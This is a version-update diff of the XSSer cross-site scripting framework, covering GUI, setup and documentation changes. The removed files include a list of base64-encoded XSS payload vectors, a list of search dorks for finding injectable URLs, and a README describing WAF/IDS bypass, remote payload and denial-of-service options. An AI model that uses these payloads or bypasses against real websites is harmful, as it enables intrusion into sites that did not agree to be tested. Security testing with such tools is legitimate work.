+    OK!, so now it is time to try to -fly- your mosquitoes-. For that, you need first to set some parameters: 
 
 
-        1)- I want to enter the url of my target, directly.
+        1)- I want to enter urls of my target, directly.
    
         2)- I don't know where are my targets... I just want to explore! :-)
 

xsser/gtk/xsser.desktop

@@ -1,5 +1,5 @@
 [Desktop Entry]
-Version=1.1
+Version=1.8
 Type=Application
 Name=XSSer
 Comment=XSSer Framework

xsser/gtk/xsser.ui

@@ -13,7 +13,7 @@
     <property name="can_default">True</property>
     <property name="has_tooltip">True</property>
     <property name="border_width">1</property>
-    <property name="title" translatable="yes">XSSer v1.7b: "ZiKA-47 Swarm!" - (https://xsser.03c8.net)</property>
+    <property name="title" translatable="yes">XSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net)</property>
     <property name="window_position">center-always</property>
     <property name="destroy_with_parent">True</property>
     <property name="icon">images/xssericon_24x24.png</property>
@@ -1722,6 +1722,74 @@
                           <object class="GtkVBox" id="vbox27">
                             <property name="visible">True</property>
                             <property name="can_focus">False</property>
+      			   <child>
+                              <object class="GtkCheckButton" id="firefox">
+                                <property name="label" translatable="yes">Firefox 12</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: FF</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="chrome">
+                                <property name="label" translatable="yes">Chrome 19 &amp; Firefox 12</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: Chrome + FF</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="iexplorer">
+                                <property name="label" translatable="yes">Internet Explorer 9</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: IE</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
+                            <child>
+                              <object class="GtkCheckButton" id="opera">
+                                <property name="label" translatable="yes">Opera 10.5 &amp; IE 6</property>
+                                <property name="visible">True</property>
+                                <property name="can_focus">True</property>
+                                <property name="receives_default">False</property>
+                                <property name="tooltip_text" translatable="yes">Browser: Opera + IE</property>
+                                <property name="xalign">0</property>
+                                <property name="draw_indicator">True</property>
+                              </object>
+                              <packing>
+                                <property name="expand">True</property>
+                                <property name="fill">False</property>
+                                <property name="padding">10</property>
+                                <property name="position">4</property>
+                              </packing>
+                            </child>
                             <child>
                               <object class="GtkCheckButton" id="phpids">
                                 <property name="label" translatable="yes">PHPIDS (&lt;0.6.5)</property>

xsser/setup.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -23,9 +21,7 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 from setuptools import setup
 import os
-
 data_files = []
-
 image_files = []
 doc_files = []
 gtk_doc_files = []
@@ -35,16 +31,14 @@ for afile in os.listdir('doc'):
 for afile in os.listdir('gtk/docs'):
     if afile != '.svn':
         gtk_doc_files.append('gtk/docs/' + afile)
-
 data_files = ['gtk/images/world.png', 'gtk/images/xsser.jpg',
               'gtk/images/xssericon_16x16.png',
               'gtk/images/xssericon_24x24.png']
 gtk_files = ['gtk/xsser.ui']
 gtk_app_files = ['gtk/xsser.desktop']
-
 setup(
     name = "xsser",
-    version = "1.7",
+    version = "1.8",
     packages = ['core', 'core.fuzzing', 'core.post'],
     data_files = [('/usr/share/doc/xsser/', doc_files), 
                   ('/usr/share/xsser/gtk/images/', data_files),

xsser/xsser

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/fuzzing/DCP.py

@@ -1,55 +0,0 @@
-#!/usr/bin/env python
-# -*- coding: utf-8 -*-"
-# vim: set expandtab tabstop=4 shiftwidth=4:
-"""
-$Id$
-
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
-
-xsser is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 3 of the License.
-
-xsser is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with xsser; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-"""
-## This file contains different XSS fuzzing vectors.
-## If you have some new, please email me to [epsylon@riseup.net]
-## Happy Cross Hacking! ;)
-
-DCPvectors = [
-		{ 'payload' : """<a href="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv YT4=""",
-                  'browser' : """[Data Control Protocol Injection]""" },
-
-		{ 'payload' : """<iframe src="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv""",
-		  'browser' : """[Data Control Protocol Injection]"""},	
-	
-		#{ 'payload' : """data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+""",
-                #  'browser' : """[Data Control Protocol Injection]"""},
-
-		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KCJYU1MiKStBRHMtaGlzdG9yeS5iYWNrKCkrQURzQVBBLS9z-""",
-		#  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,LCtBRHdBY3dCakFISUFhUUJ3QUhRQVBnKy1hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCkrQURz""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,K0FEd0Fjd0JqQUhJQWFRQndBSFFBUGdCaEFHd0FaUUJ5QUhRQUtBQXhBQ2tBT3dCb0FHa0Fjd0Iw""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KFhTUykrQURzLWhpc3RvcnkuYmFjaygpK0FEc0FQQS0vc2Ny aXB0K0FENC0=""",
-                #  'browser' : """[Data Control Protocol Injection]""" },
-
-		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+'))""",
-		  'browser' : """[Data Control Protocol Injection]"""},
-
-		{ 'payload' : """data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==""",
-                  'browser' : """[Data Control Protocol Injection]""" }
-		]

xsser/core/fuzzing/dorks.txt

@@ -1,30 +0,0 @@
-.php?cmd=
-.php?z=
-.php?q=
-.php?search=
-.php?query=
-.php?searchst­ring=
-.php?keyword=­
-.php?file=
-.php?years=
-.php?txt=
-.php?tag=
-.php?max=
-.php?from=
-.php?author=
-.php?pass=
-.php?feedback­=
-.php?mail=
-.php?cat=
-.php?vote=
-search.php?q=
-headersearch.p­hp?sid=
-/news.php?id=
-/search_results.php?search=
-/notice.php?msg= 
-/view.php?PID= 
-/search.php?search_keywords=
-/contentPage.php?id= 
-/main.php?sid=
-/feedpost.php?url=
-/poll/­default.asp?catid=

xsser/doc/AUTHOR

@@ -1,17 +0,0 @@
-========================
-
-    nick: psy (epsylon) 
-  
-    email: <epsylon@riseup.net> 
-
-=======================
-
-    web: https://03c8.net
-
-    code: https://github.com/epsylon
-
-=======================
-
-    btc: 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
-
-========================

xsser/doc/README

@@ -1,171 +0,0 @@
-================================================================
-Introduction:
-==============================
-
-Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
-
-It contains several options to try to bypass certain filters, and various special techniques of code injection.
-
-================================================================
-Options and features:
-==============================
- 
-xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
-[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
-
-Cross Site "Scripter" is an automatic -framework- to detect, exploit and
-report XSS vulnerabilities in web-based applications.
-
-Options:
-  --version             show program's version number and exit
-  -h, --help            show this help message and exit
-  -s, --statistics      show advanced statistics output results
-  -v, --verbose         active verbose mode output results
-  --gtk                 launch XSSer GTK Interface
-  --wizard              start Wizard Helper!
-
-  *Special Features*:
-    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
-    code embedded. XST allows you to discover if target is vulnerable to
-    'Cross Site Tracing' [CAPEC-107]:
-
-    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
-    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
-    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)
-
-  *Select Target(s)*:
-    At least one of these options must to be specified to set the source
-    to get target(s) urls from:
-
-    --all=TARGET        Automatically audit an entire target
-    -u URL, --url=URL   Enter target to audit
-    -i READFILE         Read target(s) urls from file
-    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
-    -l                  Search from a list of 'dorks'
-    --De=DORK_ENGINE    Use this search engine (default: yahoo)
-    --Da                Search massively using all search engines
-
-  *Select type of HTTP/HTTPS Connection(s)*:
-    These options can be used to specify which parameter(s) we want to use
-    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
-    inject:
-
-    -g GETDATA          Send payload using GET (ex: '/menu.php?id=3&q=XSS')
-    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
-    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
-    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default 3)
-    --Cl                Crawl only local target(s) urls (default TRUE)
-
-  *Configure Request(s)*:
-    These options can be used to specify how to connect to the target(s)
-    payload(s). You can choose multiple:
-
-    --cookie=COOKIE     Change your HTTP Cookie header
-    --drop-cookie       Ignore Set-Cookie header from response
-    --user-agent=AGENT  Change your HTTP User-Agent header (default SPOOFED)
-    --referer=REFERER   Use another HTTP Referer header (default NONE)
-    --xforw             Set your HTTP X-Forwarded-For with random IP values
-    --xclient           Set your HTTP X-Client-IP with random IP values
-    --headers=HEADERS   Extra HTTP headers newline separated
-    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
-    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
-    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
-    --ignore-proxy      Ignore system default HTTP proxy
-    --timeout=TIMEOUT   Select your timeout (default 30)
-    --retries=RETRIES   Retries when the connection timeouts (default 1)
-    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
-    --delay=DELAY       Delay in seconds between each HTTP request (default 0)
-    --tcp-nodelay       Use the TCP_NODELAY option
-    --follow-redirects  Follow server redirection responses (302)
-    --follow-limit=FLI  Set limit for redirection requests (default 50)
-
-  *Checker Systems*:
-    These options are useful to know if your target is using filters
-    against XSS attacks:
-
-    --hash              send a hash to check if target is repeating content
-    --heuristic         discover parameters filtered by using heuristics
-    --discode=DISCODE   set code on reply to discard an injection
-    --checkaturl=ALT    check reply using: alternative url -> Blind XSS
-    --checkmethod=ALTM  check reply using: GET or POST (default: GET)
-    --checkatdata=ALD   check reply using: alternative payload
-    --reverse-check     establish a reverse connection from target to XSSer to
-                        certify that is 100% vulnerable (recommended!)
-
-  *Select Vector(s)*:
-    These options can be used to specify injection(s) code. Important if
-    you don't want to inject a common XSS vector used by default. Choose
-    only one option:
-
-    --payload=SCRIPT    OWN  - Inject your own code
-    --auto              AUTO - Inject a list of vectors provided by XSSer
-
-  *Anti-antiXSS Firewall rules*:
-    These options can be used to try to bypass specific WAF/IDS products.
-    Choose only if required:
-
-    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
-    --Phpids0.7         PHPIDS (0.7) [ALL]
-    --Imperva           Imperva Incapsula [ALL]
-    --Webknight         WebKnight (4.1) [Chrome]
-    --F5bigip           F5 Big IP [Chrome + FF + Opera]
-    --Barracuda         Barracuda WAF [ALL]
-    --Modsec            Mod-Security [ALL]
-    --Quickdefense      QuickDefense [Chrome]
-
-  *Select Bypasser(s)*:
-    These options can be used to encode vector(s) and try to bypass
-    possible anti-XSS filters. They can be combined with other techniques:
-
-    --Str               Use method String.FromCharCode()
-    --Une               Use Unescape() function
-    --Mix               Mix String.FromCharCode() and Unescape()
-    --Dec               Use Decimal encoding
-    --Hex               Use Hexadecimal encoding
-    --Hes               Use Hexadecimal encoding with semicolons
-    --Dwo               Encode IP addresses with DWORD
-    --Doo               Encode IP addresses with Octal
-    --Cem=CEM           Set different 'Character Encoding Mutations'
-                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
-
-  *Special Technique(s)*:
-    These options can be used to inject code using different XSS
-    techniques. You can choose multiple:
-
-    --Coo               COO - Cross Site Scripting Cookie injection
-    --Xsa               XSA - Cross Site Agent Scripting
-    --Xsr               XSR - Cross Site Referer Scripting
-    --Dcp               DCP - Data Control Protocol injections
-    --Dom               DOM - Document Object Model injections
-    --Ind               IND - HTTP Response Splitting Induced code
-    --Anchor            ANC - Use Anchor Stealth payloader (DOM shadows!)
-
-  *Select Final injection(s)*:
-    These options can be used to specify the final code to inject on
-    vulnerable target(s). Important if you want to exploit 'on-the-wild'
-    the vulnerabilities found. Choose only one option:
-
-    --Fp=FINALPAYLOAD   OWN    - Exploit your own code
-    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-
-    --Doss              DOSs   - XSS (server) Denial of Service
-    --Dos               DOS    - XSS (client) Denial of Service
-    --B64               B64    - Base64 code encoding in META tag (rfc2397)
-
-  *Special Final injection(s)*:
-    These options can be used to execute some 'special' injection(s) on
-    vulnerable target(s). You can select multiple and combine them with
-    your final code (except with DCP code):
-
-    --Onm               ONM - Use onMouseMove() event
-    --Ifr               IFR - Use <iframe> source tag
-
-  *Reporting*:
-    --save              export to file (XSSreport.raw)
-    --xml=FILEXML       export to XML (--xml file.xml)
-
-  *Miscellaneous*:
-    --silent            inhibit console output results
-    --no-head           NOT send a HEAD request before start a test
-    --alive=ISALIVE     set limit of errors before check if target is alive
-    --update            check for latest stable version
-

xsser/gtk/docs/wizard0.txt

@@ -1,16 +0,0 @@
-         
-         
-          
-    ==========
-
-    Welcome to the Wizard Helper!
-
-
-    You only need to reply some questions to create your pentesting attack. If you haven't time to read, just press "Next". :-)
-
-    XSSer will take your answers to -automagically- build all the necessary commands.
-
-
-    Press "Start Wizard" button (below) to start your configuration...
-
-    ==========